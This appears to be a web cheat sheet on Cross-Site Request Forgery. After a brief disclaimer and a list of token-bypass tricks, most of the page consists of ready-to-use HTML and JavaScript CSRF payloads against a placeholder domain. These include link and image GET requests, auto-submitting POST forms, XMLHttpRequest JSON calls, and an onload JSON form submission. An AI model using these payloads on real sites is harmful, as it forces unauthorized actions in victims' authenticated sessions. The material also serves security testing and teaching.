Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

Introduction

Cross-Site Request Forgery (CSRF) is a  vulnerability where attacker trick user into performing actions on a web application where they are authenticated, without their knowledge. This can compromise the security of user data and account settings. CSRF is commonly mitigated by using tokens and modern browser security features.

Common Attack Scenarios:

  1. Removing Anti-CSRF Tokens: Attacker manipulate form data to either remove or alter the anti-CSRF tokens, which are intended to prevent unauthorized actions.
  2. Spoofing Tokens: If a backend system fails to verify the integrity of a CSRF token properly, attacker may slightly modify the token to bypass security checks.
  3. Exploiting Static Token Segments: Attacker take advantage of CSRF tokens that contain predictable or unchanging parts, using these segments to fool the validation process.
  4. Reusing CSRF Tokens: Attacker may capture valid CSRF tokens from legitimate requests and reuse them in unauthorized requests to mimic authentic interactions.

Simple GET Request

<!-- Direct user interaction required -->
<a href="http://[DOMAIN_NAME]/endpoint?parameter=CSRFd">Click here to view!</a>

GET Request Without User Interaction

<!-- Automatically triggers when the page loads -->
<img src="http://[DOMAIN_NAME]/endpoint?parameter=CSRFd" alt="img">

Simple POST Request

<!-- User must click the submit button -->
<form action="http://[DOMAIN_NAME]/endpoint" method="POST">
  <input type="hidden" name="parameter" value="CSRFd">
  <input type="submit" value="Submit Request">
</form>

POST Request Without User Interaction

<!-- Automatically submits on page load -->
<form id="autosubmit" action="http://[DOMAIN_NAME]/endpoint" method="POST">
  <input type="hidden" name="parameter" value="CSRFd">
  <input type="submit" value="Submit Request">
</form>
<script>
  document.getElementById('autosubmit').submit();
</script>

JSON GET Request

<!-- Can be detected and blocked by modern browsers due to CORS policy -->
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://[DOMAIN_NAME]/endpoint");
  xhr.send();
</script>

JSON POST Request

<!-- Using JSON to send data in a POST request -->
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://[DOMAIN_NAME]/endpoint");
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.send(JSON.stringify({parameter: "CSRFd"}));
</script>

CSRF with JSON Without User Interaction

<body onload='document.forms[0].submit()'>
<form action="https://[DOMAIN_NAME]?_method=PUT" method="POST" enctype="application/json">
  <input type="hidden" name='data' value='{"parameter":"newValue"}'>
  <input type="submit" value="Send">
</form>